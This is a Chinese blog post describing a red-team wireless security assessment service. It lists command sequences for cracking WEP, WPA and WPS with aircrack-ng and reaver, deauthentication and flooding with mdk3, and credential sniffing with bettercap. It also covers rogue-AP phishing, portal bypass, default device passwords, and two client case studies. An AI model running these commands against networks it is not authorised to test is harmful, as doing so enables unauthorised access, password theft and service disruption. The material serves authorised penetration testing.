技术分享 | 无线安全(红队服务)

admin 2020年7月17日14:53:33评论820 views字数 3164阅读10分32秒阅读模式

无线安全(红队服务)介绍

无线网络及内网渗透 ,利用“开源安全测试方法手册”(OSSTMM)和“渗透测试执行标准”(PTES)作为无线评估方法的基础,模拟来自真实世界的无线攻防,以提供漏洞和威胁评估您的无线网络及内部网络基础架构


无线安全测试思路

1. 无线网络接入评估

2. portal认证系统渗透测试

3. 内网渗透

4. 案例

5. 参考资料

无线网络接入评估

1. 无线网络接入评估--AP物理定位

android上我们使用一款叫wigle的wifi 扫描工具

https://raw.githubusercontent.com/wiglenet/wigle-wifi-wardriving/master/dist/wiglewifiwardriving-release.apk

技术分享 | 无线安全(红队服务)

导出kml文件,可以用谷歌地球(https://pc.qq.com/detail/0/detail25540.html)打开,标注在地图上的精确位置

技术分享 | 无线安全(红队服务)

2. 无线网络接入评估-WLAN网络发现-AP扫描

kali下使用airodump-ng

ifconfigairmon-ng start wlan0airodump-ng wlan0mon

技术分享 | 无线安全(红队服务)

这里主要关注各ap信号强度,SSID,station mac地址及ap加密类型信息

3. 无线网络接入评估-加密环境破解

我们首先会下载一个wifi万能钥匙,看看该企业目标wifi有没有分享出来密码的。android手机一般要root,wifi密码查看器,

或者您用的小米手机,直接可以在连接成功之后,分享出来一个二维码,二维码携带ssid和wifi密码明文

wep破解

ifconfig -a 查看所有的网卡ifconfig wlan0 up 激活无线网卡airmon-ng start wlan0 设置无线网卡模式airodump-ng wlan0mon 查看无线网络信息airodump-ng --ivs -w ice -c 6 wlan0mon 抓包aireplay-ng -3 -b 00:21:27:63:41:CE -h 00:1F:3C:5F:36:15 wlan0mon ARP request 攻击aircrack-ng ice*.ivs 开始破解

wpa/wpa2字典攻击

ifconfig -a 查看所有的网卡ifconfig wlan0 up 激活无线网卡airmon-ng start wlan0 设置无线网卡模式airodump-ng wlan0mon 查看无线网络信息airodump-ng -w ice -c 6 wlan0mon 抓包aireplay-ng -0 1 -a AP 的 mac -c 客户端的 mac wlan0mon 进行 Deauth 攻击获取 handshakeaircrack-ng -w 密码字典 ice*.cap 开始破解

wps漏洞利用

ifconfig -a 查看所有的网卡ifconfig wlan0 up 激活无线网卡airmon-ng start wlan0 设置无线网卡模式airodump-ng wlan0mon 查看无线网络信息wash -i wlan0mon -C 扫描开启了wps的路由器reaver -i wlan0mon -b mac地址 -vv -K 1

4. 无线网络接入评估-无线网络设备安全威胁/脆弱性测试

1.中间人攻击及捕获数据分析

使用bettercap嗅探认证登陆请求 bettercap -I eth0 --proxy -P POST

技术分享 | 无线安全(红队服务)

2.对AC设备进行检查

使用burpsuite查看是否明文传输,是否有外网访问管理地址,端口,服务开放情况,有无漏洞

3.snmp探测

snmpwalk -v 2c -c public x.x.x.x

4.ac设备的ddos能力测试

主要测试ac的web页面防止ddos的能力

使用工具:cc攻击工具/SYN flood攻击工具

技术分享 | 无线安全(红队服务)



5.对AP设备进行DDOS攻击

进行客户端与ap的认证和关联中的各种压力测试,包括DEAUTH和AUTH等攻击

使用工具:mdk3(最新版本是mdk4)

mdk3 mon0 a -a MAC(MAC为你要攻击的目标MAC)mdk3 wlan0mon d -c 11 攻击指定的频道, 让频道为 11 所有计算机都掉线mdk3 wlan0mon b -f wifi.txt –t –c 6 –s 80 创建自定义文本里的wifimdk3 wlan0mon b -g -c 11 -h 7 创建一大堆乱码wifi

5.无线网络接入评估-业务安全评估

1.伪造ap测试

伪造一个和目标ap一样的wifi,然后进行钓鱼攻击,并验证钓鱼机制

使用工具:airbase-ng fakeap mitmap等伪造ap的工具,或者使用wifipineapple-Dwall模块搭建钓鱼认证接入点

2.认证方式测试

鉴于部分认证用户只是通过ip来认证,当一个在线用户被踢下线以后,另一个用同样的ip可以继续访问

测试方法:通过两台笔记本配合测试,插拔网线并进行浏览器浏览

3.绕过认证测试 通过分析网络结构,获取ap等终端信息,利用设备ip地址进行连接,测试是否能正常上网

4.dns穿透测试

对dns的限制进行测试,测试是否能进行dns重定向

测试工具和方法:openvpn,loopcvpn,集成工具wifipineapple-dnsspoof模块


 Portal认证系统渗透测试

主要发现AC,AP设备系统的漏洞,WEB系统的漏洞(如xss攻击,认证绕过,从而进行网站的渗透,获得系统的权限,并植入后门

技术分享 | 无线安全(红队服务)

内网漏洞挖掘--测试准备

1.连接测试,端口扫描

扫描网关设备(AC或者AP),以获得其开放端口及系统信息 使用nmap进行扫描,或者goby

2.网络设备弱口令探测

goby进行扫描,或者routescan,特别关注设备弱口令(h3c或者cisco的),常用设备弱口令(https://copyfuture.com/blogs-details/20200522163334840iara7vwvwdrzm5w)

如迪普设备admin/admin-default

3.主机/WEB漏洞挖掘

使用awvs,goby进行内网主机系统的扫描和测试。

案例

1. 某金融行业客户,让我们给他们做wifi的接入点的测试

通过接入网点大厅无线网络xxxx,在不进行实名认证(手机短信认证)的情况下进行探测攻击:

探测到可访问sangfor深信服上网行为管理地址:https://10.11.10.1/login.html?namejpgraphantispam=1048689685#

技术分享 | 无线安全(红队服务)

探测到无线控制器WEB管理地址:https://10.10.16.7:4343/screens/wms/wms.login

技术分享 | 无线安全(红队服务)

探测到其他存活IP及开放端口如下:

技术分享 | 无线安全(红队服务)

安全建议:建议针对用户接入无线网络时,在无线网关设置访问控制策略或者部署防火墙进行访问范围进行限制(做好ACL访问控制),且设备自身关闭不必要的服务端口。

2. 某金融行业客户,让我们给他们做wifi的接入点的测试

接入点是h3c的ap,连上之后需要手机短信认证。

团队成员简单的测试了一下,发现了,手机短信验证码在返回包里。然后存在xss,还有短信轰炸漏洞.

安全建议:portal认证的ap,上线前要做渗透测试,有的还有st2这种漏洞。这种边界系统安全不可忽视

参考资料

https://max.book118.com/html/2020/0618/5101324230002304.shtm无线安全评估服务介绍

http://www.techcan.com.cn/newsview.aspx?newsid=88 金融行业加强无线网络安全(银保监会50号文)广州天畅运营方案

xx集团-安全服务部无线网络安全评估服务白皮书

天巡移动式无线安全评估系统产品白皮书

天巡无线入侵防御系统解决方案V2.0

WiFiPineapple-黑色外置天线版-用户手册-V1.3

另外比较深入的案例,可以在《黑客大揭秘近源渗透测试》最后2节近源渗透测试案例,可以看


  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年7月17日14:53:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   技术分享 | 无线安全(红队服务)http://cn-sec.com/archives/78481.html

发表评论

匿名网友 填写信息